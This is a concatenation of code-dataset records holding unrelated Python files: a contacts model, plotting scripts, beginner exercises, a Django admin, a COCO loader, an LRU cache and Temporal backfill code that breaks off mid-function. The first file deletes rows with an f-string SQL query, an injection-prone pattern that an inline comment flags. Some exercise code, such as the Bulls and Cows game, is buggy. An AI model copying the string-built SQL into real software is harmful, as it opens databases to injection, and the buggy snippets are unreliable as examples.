     
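# (illustrative aside, not part of the original post) building SQL with f-strings\n        # like the call below is injection-prone; sqlite3 also accepts parameterized\n        # queries, e.g.: cursor.execute(\"delete from phone where id=?\", (id,))\n        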
cursor.execute(\n f\"delete from phone where id={id}\"\n )\n conn.commit()\n return 'Контакт был успешно удален'\n except:\n return 'Контакт не найден. Попробуйте еще раз'\n\n\n","repo_name":"Andrey30011979/HelloPython","sub_path":"Seminar9/HomeWork9/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74314417446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nDescription : Test various binarization for computing community degree\n\nAuthor: Béatrice Désy\n\nDate : 03/05/2022\n\"\"\"\n\n\nimport numpy as np\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import quad\n\nmatplotlib.rc('text', usetex=True)\nmatplotlib.rc('font', size=10)\n\ndef get_dict_key(D, dd, nc, beta, f):\n return 'S{}-'.format(D)+dd+'-{}coms-{}beta-{:.2f}sigmam'.format(nc, beta, f)\n\ndef retrieve_data(data_dict, D, dd, nc, beta, frac_sigma_axis, bins):\n y = []\n for f in frac_sigma_axis:\n key = get_dict_key(D, dd, nc, beta, f)+'-degrees-'+bins\n data = np.array(data_dict[key])\n y.append(data)\n y_data = np.array(y)\n if False:#bins=='backbone':\n y = np.mean(np.max(y_data, axis=2), axis=1)\n err = np.std(np.max(y_data, axis=2), axis=1)\n else:\n y = np.mean(np.mean(y_data, axis=2), axis=1)\n err = np.std(np.mean(y_data, axis=2), axis=1)\n return y, err\n\ndef measure_community_degrees_gthreshold(matrices_list, t):\n data = []\n for m in matrices_list:\n m = np.array(m)\n binary_mat = np.where(m>t, 1, 0)\n degrees = list(np.sum(binary_mat, axis=0).astype(float))\n data.append(degrees)\n return data\n\ndef measure_community_degrees_proportional(matrices_list):\n pass\n\ndef measure_community_degrees_backbone(matrices_list, alpha, show=False):\n data = []\n for m in matrices_list:\n mat = 2*np.array(m)/np.sum(m)\n binary_mat = binarize_using_backbone_method(mat, alpha)\n degrees = list(np.sum(binary_mat, axis=0).astype(float))\n data.append(degrees)\n if show:\n plt.imshow(binary_mat)\n plt.colorbar\n plt.show()\n return data\n\ndef binarize_using_backbone_method(m, alpha):\n n = m.shape[0]\n binary_mat = np.zeros(m.shape)\n for i in range(n):\n for j in range(i):\n p_ij = m[i,j] / np.sum(m[i, :])\n binary_mat[i,j] = int((1-p_ij)**(n-2) < alpha)\n out = binary_mat + binary_mat.T\n assert np.max(out)<1.1, 'max is greater than 1'\n return out\n\ndd='pwl'\nfrac_sigma_axis = np.linspace(0.05, 0.95, 30)\nbeta_r = 3.5\nnc_list = [5,15,25]\n\nt = 10\n\ncompute = True\nif compute:\n with open('data/experiment_entropy_pwl_deg4_blockmatrices.json', 'r') as read_file:\n matrices_dict = json.load(read_file)\n with open('data/experiment_entropy_pwl_deg4.json', 'r') as read_file:\n initial_data_dict = json.load(read_file)\n\n \n res = {}\n for D in [1,2]:\n beta = beta_r*D\n for nc in nc_list:\n for f in frac_sigma_axis:\n key = get_dict_key(D, dd, nc, beta, f)\n dist_gthreshold = measure_community_degrees_gthreshold(matrices_dict[key], t)\n #print(key)\n dist_backbone = measure_community_degrees_backbone(matrices_dict[key], 0.2, show=False)\n key+='-degrees'\n dist_first = initial_data_dict[key]\n res[key+'-first'] = dist_first\n res[key+'-gthreshold'+str(int(t))] = dist_gthreshold\n res[key+'-backbone'] = dist_backbone\n \n #with open('data/community_degrees_various_binarizations.json', 'w') as write_file:\n # json.dump(res, write_file, indent=4)\n\nelse:\n with open('data/community_degrees_various_binarizations.json', 'r') as read_file:\n 
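# (clarifying note, added) the plotting loop below calls retrieve_data(res, ...),\n        # so the cached results must be loaded under that same name for this branch to work.\n        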
res = json.load(read_file)\n\ncmap = matplotlib.cm.get_cmap('viridis')\ncolors = [cmap(0.), cmap(2.2/5)]\nformats = [':', '--', '-']\nbidon = np.linspace(100, 110, 1000)\n\nsb = [121, 122]\nfig, axes = plt.subplots(1, 2, figsize=(3.4, 3.), sharey=True)\ni=0\nfor bins in ['gthreshold'+str(int(t)), 'backbone']:\n    ax = axes[i]\n    for c in range(len(nc_list)):\n        nc = nc_list[c]\n        ax.plot(bidon, np.ones(bidon.shape), \n            formats[c], c='k', alpha=0.5,\n            label=r'$n = {}$'.format(nc))\n        for D in [1,2]:\n            beta = beta_r*D\n            y, err = retrieve_data(res, D, dd, nc, beta, frac_sigma_axis, bins)\n\n            if nc==25:\n                lab = r'$D = {}$'.format(D)\n            else:\n                lab=None\n\n            ax.plot(frac_sigma_axis, y, linestyle=formats[c], color=colors[D-1], \n                label=lab)\n            ax.fill_between(frac_sigma_axis, y-err, y+err, \n                alpha=0.3, color=colors[D-1], linewidth=0.0)\n    ax.set_xlabel(r'$\\sigma$')\n    ax.set_xlim(0.05, 0.95)\n    i+=1\n\naxes[0].set_ylabel(r'$\\langle k\\rangle$')\naxes[0].legend(loc=(0.053, 0.532), frameon=False)\nplt.ylim(0,7.5)\nplt.tight_layout()\naxes[0].set_rasterized(True)\naxes[1].set_rasterized(True)\naxes[0].spines['top'].set_visible(False)\naxes[0].spines['right'].set_visible(False)\naxes[1].spines['top'].set_visible(False)\naxes[1].spines['right'].set_visible(False)\nplt.savefig('binarization.eps', dpi=600, format='eps')\nplt.show()\n","repo_name":"bdesy/communities_modelSd","sub_path":"scripts/figures/fig9_other_binarization.py","file_name":"fig9_other_binarization.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2682256872","text":"#!/usr/bin/python3\nimport random\nnumber = random.randint(-10000, 10000)\ndig = number % 10\nif number < 0 and dig != 0:\n    neg = number * -1\n    dig = neg % 10\n    if dig != 0:\n        dig = dig * -1\nelse:\n    dig = number % 10\nif dig > 5:\n    print(\"Last digit of\" \" {:d}\"\n          .format(number) + \" is\" + \" {:d}\"\n          .format(dig) + \" and is greater than 5\")\nelif dig < 6 and dig != 0:\n    print(\"Last digit of\" \" {:d}\".format(number) + \" is\" + \" {:d}\"\n          .format(dig) + \" and is less than 6 and not 0\")\nelse:\n    print(\"Last digit of\" + \" {:d}\"\n          .format(number) + \" is\" + \" {:d}\".format(dig) + \" and is 0\")\n","repo_name":"angelofgrace/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/1-last_digit.py","file_name":"1-last_digit.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14594424226","text":"\"\"\"\r\nauthor: Lavi Jacob Landa\r\ndate: 3/1/2022\r\nexplain: A simple Bulls and Cows game!\r\n\"\"\"\r\nimport os\r\nimport random\r\n\r\n\r\ndef create_code(colors: list) -> list:\r\n    code = []\r\n    for i in range(5, 1, -1):\r\n        number = random.randint(0, i)\r\n        code.append(colors[number])\r\n        colors.remove(colors[number])\r\n    return code\r\n\r\n\r\ndef get_player_input(colors: list) -> str:\r\n    invalid = False\r\n    while not invalid:\r\n        entered = input(\"Enter 4 different colors r/g/b/y/o/c (for example\" +\r\n                        \"rgby): \")\r\n        if len(entered) != 4:\r\n            print(\"You need to enter 4 colors!\")\r\n            invalid = True\r\n        else:\r\n            for i in range(4):\r\n                if not invalid:\r\n                    if entered.count(entered[i]) != 1:\r\n                        invalid = True\r\n            if not invalid:\r\n                for h in entered:\r\n                    if not invalid:\r\n                        if h not in colors:\r\n                            print(f\"You need to enter r/g/b/y/o/c not {h}\")\r\n                            invalid = True\r\n            else:\r\n                print(\"You need to enter different 
colors!\")\r\n if not invalid:\r\n return entered\r\n invalid = False\r\n\r\n\r\ndef show_board(guessed: list, results: list) -> None:\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n output = \"\"\r\n for i in range(len(guessed)):\r\n if i < len(results)//2:\r\n output += guessed[i] + \" - \" +\\\r\n f\"{results[i*2-1]} whites and {results[i*2]} blacks\\n\"\r\n print(output)\r\n\r\n\r\ndef start() -> None:\r\n guessed = []\r\n results = []\r\n colors = (\r\n 'r',\r\n 'g',\r\n 'b',\r\n 'y',\r\n 'o',\r\n 'c'\r\n )\r\n code = create_code(list(colors))\r\n place, color, winner = 0, 0, False\r\n for i in range(10):\r\n guessed.append(get_player_input(list(colors)))\r\n for h in range(4):\r\n if guessed[i][h] in code:\r\n if guessed[i][h] == code[h]:\r\n place = place + 1\r\n else:\r\n color = color + 1\r\n if place == 4:\r\n winner = True\r\n break\r\n else:\r\n results.append(place)\r\n results.append(color)\r\n show_board(guessed, results)\r\n place, color = 0, 0\r\n\r\n if winner:\r\n print(f\" YOU WIN!\\nYou got it right in {i+1} moves\")\r\n else:\r\n print(\"You didn't win, try next time!\\nThe answer was \" +\r\n f\"{code[0] + code[1] + code[2] + code[3]}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n start()\r\n","repo_name":"pookmaster21/Classroom","sub_path":"py/Bulls_and_Cows.py","file_name":"Bulls_and_Cows.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17171277335","text":"from django.contrib import admin\n\nfrom support.models import Inquiry, Answer\n\n# Register your models here.\n\n# admin.site.register(Inquiry)\n# admin.site.register(Answer)\n\nclass AnswerInline(admin.TabularInline):\n model = Answer\n min_num = 1\n verbose_name=\"설문 질문 항목\"\n\n\n@admin.register(Inquiry)\nclass InquiryModelAdmin(admin.ModelAdmin):\n list_display = ('title','category','created_by_id','created_at')\n search_fields = ('title', 'email', 'phone')\n search_help_text = '[제목, 이메일, 전화번호] 항목으로 검색 가능합니다'\n inlines = [AnswerInline]","repo_name":"Django-Mission/django_mission_03-KooHyunJung","sub_path":"support/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13514448340","text":"import os\nimport torch\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nimport pycocotools.coco as coco\nfrom torchvision import transforms\nimport numpy as np\n\nclass cocoDataset(Dataset):\n def __init__(self, coco_folder, mode):\n super(cocoDataset, self).__init__()\n self.coco_folder = coco_folder\n self.mode = mode # 'train' or 'eval'\n self.split = 'train2017' if self.mode == 'train' else 'val2017'\n\n self.image_folder = os.path.join(self.coco_folder, 'images', self.split)\n self.annotation_folder = os.path.join(self.coco_folder, 'annotations')\n self.annotation_path = os.path.join(self.annotation_folder, f'instances_{self.split}.json')\n\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n ])\n\n self.max_objs = 128\n self.class_name = [\n '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',\n 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse',\n 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack',\n 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis',\n 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball 
glove',\n 'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass',\n 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich',\n 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake',\n 'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',\n 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\n\n self._valid_ids = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, \n 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, \n 24, 25, 27, 28, 31, 32, 33, 34, 35, 36, \n 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, \n 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, \n 58, 59, 60, 61, 62, 63, 64, 65, 67, 70, \n 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, \n 82, 84, 85, 86, 87, 88, 89, 90]\n\n print('==> initializing coco {} data.'.format(self.split))\n self.coco = coco.COCO(self.annotation_path)\n self.images = self.coco.getImgIds()\n self.num_samples = len(self.images)\n\n print('Loaded {} {} samples'.format(self.split, self.num_samples))\n \n def __len__(self):\n return self.num_samples\n \n def __getitem__(self, index):\n img_id = self.images[index]\n file_name = self.coco.loadImgs(ids=[img_id])[0]['file_name']\n img_path = os.path.join(self.image_folder, file_name)\n ann_ids = self.coco.getAnnIds(imgIds=[img_id])\n anns = self.coco.loadAnns(ids=ann_ids)\n num_objs = min(len(anns), self.max_objs)\n \n image = Image.open(img_path).convert(\"RGB\")\n image = self.transform(image)\n\n boxes = [] \n for i in range(num_objs):\n ann = anns[i]\n box = ann['bbox'] # x1, y1, w, h\n if box[2] <= 0 or box[3] <= 0 : \n continue \n box = np.array([box[0], box[1], box[0] + box[2], box[1] + box[3]],\n dtype=np.float32)\n obj_index = ann['category_id']\n \n boxes.append([obj_index, box])\n\n return image, boxes, img_id","repo_name":"JungminChung/fasterRCNN","sub_path":"datasets/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18972818868","text":"#!/usr/bin/env python3\n\"\"\"A class Least Recently Used Cache that inherits from\nBaseCaching and is a caching system:\n\"\"\"\n\n\nBaseCaching = __import__('base_caching').BaseCaching\n\n\nclass LRUCache(BaseCaching):\n \"\"\" Represents an object that allows storing and\n retrieving items from a dictionary with a LRU\n removal mechanism when the limit is reached.\n \"\"\"\n\n def __init__(self):\n \"\"\"initialize the object's attributes\n \"\"\"\n super().__init__()\n self.usedKeys = []\n\n def put(self, key, item):\n \"\"\"to add or update an item in the cache\n based on the provided key\n\n Args:\n key (_type_): _description_\n item (_type_): _description_\n \"\"\"\n if key is not None and item is not None:\n self.cache_data[key] = item\n if key not in self.usedKeys:\n self.usedKeys.append(key)\n else:\n self.usedKeys.append(\n self.usedKeys.pop(self.usedKeys.index(key)))\n if len(self.usedKeys) > BaseCaching.MAX_ITEMS:\n discard = self.usedKeys.pop(0)\n del self.cache_data[discard]\n print('DISCARD: {:s}'.format(discard))\n\n def get(self, key):\n \"\"\"returnss the value in self.cache_data linked to key\n\n Args:\n key (_type_): _description_\n \"\"\"\n if key is not None and key in self.cache_data.keys():\n self.usedKeys.append(self.usedKeys.pop(self.usedKeys.index(key)))\n return self.cache_data.get(key)\n return 
None\n","repo_name":"EYATUPE/alx-backend","sub_path":"0x01-caching/3-lru_cache.py","file_name":"3-lru_cache.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35603262294","text":"from funcoesTermosol import *\nfrom calculo_matrizes import *\nfrom solucoes import *\n\nimport numpy as np\n\n[nn,N,nm,Inc,nc,F,nr,R] = importa('validacao.xls')\n\nKG = calcula_KG(Inc, N)\n\nR = R.flatten().astype(int)\n\nKG_com_restricoes, F_com_restricoes = reduz_matrizes(KG, F, R)\n\ndeslocamentos = sistema_de_equacoes(KG_com_restricoes, F_com_restricoes, nn, R)\n\nreacoes_de_apoio = reacao_de_apoio(deslocamentos, KG, R)\n\nlista_deformacoes, lista_tensoes, lista_forcas_internas = deformacao_tensao_forca_interna(Inc, N, deslocamentos)\n\ngeraSaida(\"saida.txt\", reacoes_de_apoio, deslocamentos, lista_deformacoes, lista_forcas_internas, lista_tensoes)\n\nplota(N, Inc)\n\nN_novo = np.array(N)\nfor i in range(len(N_novo[0])):\n N_novo[0, i] += deslocamentos[i*2]\n N_novo[1, i] += deslocamentos[i*2+1]\n\nplota(N_novo, Inc)","repo_name":"rodme02/APS4_BigMath","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352559537","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n\n输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构)\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x, left=None, right=None):\n self.val = x\n self.left = left\n self.right = right\n\ndef get_pre(pRoot, lst):\n if pRoot:\n lst.append(str(pRoot.val))\n get_pre(pRoot.left, lst)\n get_pre(pRoot.right, lst)\n else:\n lst.append(str('$'))\n\ndef get_in(pRoot, lst):\n if pRoot:\n get_in(pRoot.left, lst)\n lst.append(str(pRoot.val))\n get_in(pRoot.right, lst)\n else:\n lst.append(str('$'))\n\ndef in_array( src, tgt): \n n = len(src)\n i, j = 0, 0\n flag = False\n while j < len(tgt):\n if i == n:\n if flag:\n return True\n return False\n if not flag and tgt[j] == src[i]:\n flag = True\n i += 1\n j += 1\n continue\n if flag and tgt[j] != src[i]:\n i = 0\n j -= 1\n flag = False\n if flag:\n i += 1\n j+=1\n\n return False\n\ndef hasSubtree(pRoot1, pRoot2):\n if not pRoot2 or not pRoot1:\n return False\n pre1, pre2 = [], []\n in1, in2 = [], []\n get_pre(pRoot1, pre1)\n get_pre(pRoot2, pre2)\n #print(pre1, pre2)\n # check \n if in_array(pre2, pre1):\n get_in(pRoot1, in1)\n get_in(pRoot2, in2)\n return in_array(in2, in1)\n return False\n\nif __name__ == '__main__':\n #print(in_array([4, 1, 2], [4, 4, 1, 2, 3, 5]))\n root1 = TreeNode(8, TreeNode(8, TreeNode(9), TreeNode(2)), TreeNode(7, TreeNode(1), TreeNode(1)))\n root2 = TreeNode(8, TreeNode(9), TreeNode(2))\n print(hasSubtree(root1, root2))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"4671818429","text":"import random\n\npossible_dices = (\n \"D100\",\n \"D20\",\n \"D12\",\n \"D10\",\n \"D8\",\n \"D6\",\n \"D4\",\n \"D3\"\n)\n\ndef dice_code():\n \"\"\"\n Simulate dice throws\n :return: Integer; dice throws result\n \"\"\"\n user_input = input(\"Insert dice:\")\n for dice in possible_dices:\n if dice in user_input:\n try:\n throws_number, optional = user_input.split(dice)\n optional = int(optional) if optional else 0\n 
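The "is B a substructure of A" record above matches pre-order and in-order serializations with a hand-rolled subarray search; the textbook alternative is a direct recursion, sketched below under the same TreeNode shape and the same convention that an empty tree is not a substructure of anything:

```python
class TreeNode:
    def __init__(self, val, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def same_from_root(a, b):
    """b is fully matched once it runs out; a may have extra children below."""
    if b is None:
        return True
    if a is None or a.val != b.val:
        return False
    return same_from_root(a.left, b.left) and same_from_root(a.right, b.right)

def has_subtree(root_a, root_b):
    if root_a is None or root_b is None:
        return False
    return (same_from_root(root_a, root_b)
            or has_subtree(root_a.left, root_b)
            or has_subtree(root_a.right, root_b))

# Mirrors the __main__ check in the record above:
a = TreeNode(8, TreeNode(8, TreeNode(9), TreeNode(2)), TreeNode(7))
b = TreeNode(8, TreeNode(9), TreeNode(2))
assert has_subtree(a, b) is True
```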
throws_number = int(throws_number) if throws_number else 1\n dice_number = int(dice[1:])\n throws_result = [random.randint(1, dice_number) for _ in range(throws_number)]\n return sum(throws_result) + optional\n except ValueError:\n return \"Wrong input\"\n break\n else:\n return \"Wrong Input\"\n\nprint(dice_code())","repo_name":"KrzysztofCalus/Workshop_dice","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4680369940","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport logging\nimport time\nimport os\n\nNODE_NAME = 'ela'\nELASTOS_PATH = ['src', 'github.com', 'elastos']\nELA_PATH = ELASTOS_PATH + ['Elastos.ELA']\nSPV_PATH = ELASTOS_PATH + ['Elastos.ELA.SPV']\nSPV_NODE_PATH = ELASTOS_PATH + ['Elastos.ELA.SPV.Node']\nSIDECHAIN_PATH = ELASTOS_PATH + ['Elastos.ELA.SideChain']\nARBITER_PATH = ELASTOS_PATH + ['Elastos.ELA.Arbiter']\n\nSPV_NODE_NAME = 'service'\nSPV_CONFIGURATION_FILE = 'config.json'\nTEST_PATH = './test'\n\nDEFAULT_CONFIG_FILE = {\n 'Configuration': {\n 'Magic': 1234567,\n 'Version': 23,\n 'SeedList': [],\n 'HttpInfoPort': 10333,\n 'HttpInfoStart': True,\n 'HttpRestPort': 10334,\n 'HttpWsPort': 10335,\n 'WsHeartbeatInterval': 60,\n 'HttpJsonPort': 10336,\n 'NodePort': 10338,\n 'NodeOpenPort': 10866,\n 'OpenService': False,\n 'PrintLevel': 0,\n 'IsTLS': False,\n 'MultiCoreNum': 4,\n 'MaxTransactionInBlock': 10000,\n 'MaxBlockSize': 8000000,\n 'PowConfiguration': {\n 'PayToAddr': '8VYXVxKKSAxkmRrfmGpQR2Kc66XhG6m3ta',\n 'AutoMining': False,\n 'MinerInfo': 'ELA',\n 'MinTxFee': 100,\n 'ActiveNet': 'RegNet'\n }\n }\n}\n\nLOAD_TIME = time.strftime(\"%b-%d-%Y-%H:%M:%S\")\nlogger = logging.getLogger('TestFramework')\nlogger.setLevel(logging.DEBUG)\nconsole_handler = logging.StreamHandler()\nif not os.path.exists('./logs'):\n os.makedirs('./logs')\nfile_handler = logging.FileHandler('logs/' + LOAD_TIME + '.log')\nformatter = logging.Formatter('%(asctime)s [line:%(lineno)d]'\n '%(levelname)s %(message)s')\nconsole_handler.setFormatter(formatter)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n","repo_name":"hejianhui/Elastos.ELA.PythonAutoTest","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39513532369","text":"import asyncio\nimport collections.abc\nimport dataclasses\nimport datetime as dt\nimport json\nimport typing\n\nimport temporalio\nimport temporalio.activity\nimport temporalio.client\nimport temporalio.common\nimport temporalio.exceptions\nimport temporalio.workflow\nfrom django.conf import settings\n\nfrom posthog.batch_exports.service import BackfillBatchExportInputs\nfrom posthog.temporal.batch_exports.base import PostHogWorkflow\nfrom posthog.temporal.batch_exports.batch_exports import (\n CreateBatchExportBackfillInputs,\n UpdateBatchExportBackfillStatusInputs,\n create_batch_export_backfill_model,\n update_batch_export_backfill_model_status,\n)\nfrom posthog.temporal.common.client import connect\n\n\nclass TemporalScheduleNotFoundError(Exception):\n \"\"\"Exception raised when a Temporal Schedule is not found.\"\"\"\n\n def __init__(self, schedule_id: str):\n super().__init__(f\"The Temporal Schedule {schedule_id} was not found (maybe it was deleted?)\")\n\n\nclass HeartbeatDetails(typing.NamedTuple):\n \"\"\"Details 
sent over in a Temporal Activity heartbeat.\"\"\"\n\n schedule_id: str\n start_at: str\n end_at: str\n wait_start_at: str\n\n def make_activity_heartbeat_while_running(\n self, function_to_run: collections.abc.Callable, heartbeat_every: dt.timedelta\n ) -> collections.abc.Callable[..., collections.abc.Coroutine]:\n \"\"\"Return a callable that returns a coroutine that heartbeats with these HeartbeatDetails.\n\n The returned callable wraps 'function_to_run' while heartbeating every 'heartbeat_every'\n seconds.\n \"\"\"\n\n async def heartbeat() -> None:\n \"\"\"Heartbeat every 'heartbeat_every' seconds.\"\"\"\n while True:\n await asyncio.sleep(heartbeat_every.total_seconds())\n temporalio.activity.heartbeat(self)\n\n async def heartbeat_while_running(*args, **kwargs):\n \"\"\"Wrap 'function_to_run' to asynchronously heartbeat while awaiting.\"\"\"\n heartbeat_task = asyncio.create_task(heartbeat())\n\n try:\n return await function_to_run(*args, **kwargs)\n finally:\n heartbeat_task.cancel()\n await asyncio.wait([heartbeat_task])\n\n return heartbeat_while_running\n\n\n@temporalio.activity.defn\nasync def get_schedule_frequency(schedule_id: str) -> float:\n \"\"\"Return a Temporal Schedule's frequency.\n\n This assumes that the Schedule has one interval set.\n\n Raises:\n TemporalScheduleNotFoundError: If the Temporal Schedule whose frequency we are trying to get doesn't exist.\n \"\"\"\n client = await connect(\n settings.TEMPORAL_HOST,\n settings.TEMPORAL_PORT,\n settings.TEMPORAL_NAMESPACE,\n settings.TEMPORAL_CLIENT_ROOT_CA,\n settings.TEMPORAL_CLIENT_CERT,\n settings.TEMPORAL_CLIENT_KEY,\n )\n\n handle = client.get_schedule_handle(schedule_id)\n\n try:\n desc = await handle.describe()\n except temporalio.service.RPCError as e:\n if e.status == temporalio.service.RPCStatusCode.NOT_FOUND:\n raise TemporalScheduleNotFoundError(schedule_id)\n else:\n raise\n\n interval = desc.schedule.spec.intervals[0]\n return interval.every.total_seconds()\n\n\n@dataclasses.dataclass\nclass BackfillScheduleInputs:\n \"\"\"Inputs for the backfill_schedule Activity.\"\"\"\n\n schedule_id: str\n start_at: str\n end_at: str\n frequency_seconds: float\n buffer_limit: int = 1\n wait_delay: float = 5.0\n\n\n@temporalio.activity.defn\nasync def backfill_schedule(inputs: BackfillScheduleInputs) -> None:\n \"\"\"Temporal Activity to backfill a Temporal Schedule.\n\n The backfill is broken up into batches of inputs.buffer_limit size. 
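The `make_activity_heartbeat_while_running` wrapper in the PostHog record above is an instance of a general asyncio pattern: run a periodic side-effect alongside a main coroutine and cancel it in `finally`. A standalone sketch of the same shape, with the Temporal-specific calls stripped and illustrative names:

```python
import asyncio
from datetime import timedelta

async def run_with_heartbeat(work, heartbeat, every: timedelta):
    """Run the `work` coroutine factory while firing `heartbeat()` periodically.

    The periodic task is cancelled and drained in `finally`, the same shape as
    make_activity_heartbeat_while_running above.
    """
    async def beat():
        while True:
            await asyncio.sleep(every.total_seconds())
            heartbeat()

    beat_task = asyncio.create_task(beat())
    try:
        return await work()
    finally:
        beat_task.cancel()
        await asyncio.wait([beat_task])

async def demo():
    # Fires the heartbeat twice while the one-second "activity" runs,
    # then returns the activity's result.
    return await run_with_heartbeat(
        lambda: asyncio.sleep(1, result="done"),
        lambda: print(".", end="", flush=True),
        every=timedelta(seconds=0.4),
    )

# asyncio.run(demo())
```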
After a backfill batch is\n requested, we wait for it to be done before continuing with the next.\n\n This activity heartbeats while waiting to allow cancelling an ongoing backfill.\n \"\"\"\n start_at = dt.datetime.fromisoformat(inputs.start_at)\n end_at = dt.datetime.fromisoformat(inputs.end_at)\n\n client = await connect(\n settings.TEMPORAL_HOST,\n settings.TEMPORAL_PORT,\n settings.TEMPORAL_NAMESPACE,\n settings.TEMPORAL_CLIENT_ROOT_CA,\n settings.TEMPORAL_CLIENT_CERT,\n settings.TEMPORAL_CLIENT_KEY,\n )\n\n heartbeat_timeout = temporalio.activity.info().heartbeat_timeout\n\n details = temporalio.activity.info().heartbeat_details\n\n if details:\n # If we receive details from a previous run, it means we were restarted for some reason.\n # Let's not double-backfill and instead wait for any outstanding runs.\n last_activity_details = HeartbeatDetails(*details[0])\n\n details = HeartbeatDetails(\n schedule_id=inputs.schedule_id,\n start_at=last_activity_details.start_at,\n end_at=last_activity_details.end_at,\n wait_start_at=last_activity_details.wait_start_at,\n )\n\n await wait_for_schedule_backfill_in_range_with_heartbeat(details, client, heartbeat_timeout, inputs.wait_delay)\n\n # Update start_at to resume from the end of the period we just waited for\n start_at = dt.datetime.fromisoformat(last_activity_details.end_at)\n\n handle = client.get_schedule_handle(inputs.schedule_id)\n\n description = await handle.describe()\n jitter = description.schedule.spec.jitter\n\n frequency = dt.timedelta(seconds=inputs.frequency_seconds)\n full_backfill_range = backfill_range(start_at, end_at, frequency * inputs.buffer_limit)\n\n for backfill_start_at, backfill_end_at in full_backfill_range:\n utcnow = dt.datetime.now(dt.timezone.utc)\n\n if jitter is not None:\n backfill_end_at = backfill_end_at + jitter\n\n backfill = temporalio.client.ScheduleBackfill(\n start_at=backfill_start_at,\n end_at=backfill_end_at,\n overlap=temporalio.client.ScheduleOverlapPolicy.ALLOW_ALL,\n )\n await handle.backfill(backfill)\n\n details = HeartbeatDetails(\n schedule_id=inputs.schedule_id,\n start_at=backfill_start_at.isoformat(),\n end_at=backfill_end_at.isoformat(),\n wait_start_at=utcnow.isoformat(),\n )\n\n await wait_for_schedule_backfill_in_range_with_heartbeat(details, client, heartbeat_timeout, inputs.wait_delay)\n\n\nasync def wait_for_schedule_backfill_in_range_with_heartbeat(\n heartbeat_details: HeartbeatDetails,\n client: temporalio.client.Client,\n heartbeat_timeout: dt.timedelta | None = None,\n wait_delay: float = 5.0,\n):\n \"\"\"Decide if heartbeating is required while waiting for a backfill in range to finish.\"\"\"\n if heartbeat_timeout:\n wait_func = heartbeat_details.make_activity_heartbeat_while_running(\n wait_for_schedule_backfill_in_range, heartbeat_every=dt.timedelta(seconds=1)\n )\n else:\n wait_func = wait_for_schedule_backfill_in_range\n\n await wait_func(\n client,\n heartbeat_details.schedule_id,\n dt.datetime.fromisoformat(heartbeat_details.start_at),\n dt.datetime.fromisoformat(heartbeat_details.end_at),\n dt.datetime.fromisoformat(heartbeat_details.wait_start_at),\n wait_delay,\n )\n\n\nasync def wait_for_schedule_backfill_in_range(\n client: temporalio.client.Client,\n schedule_id: str,\n start_at: dt.datetime,\n end_at: dt.datetime,\n now: dt.datetime,\n wait_delay: float = 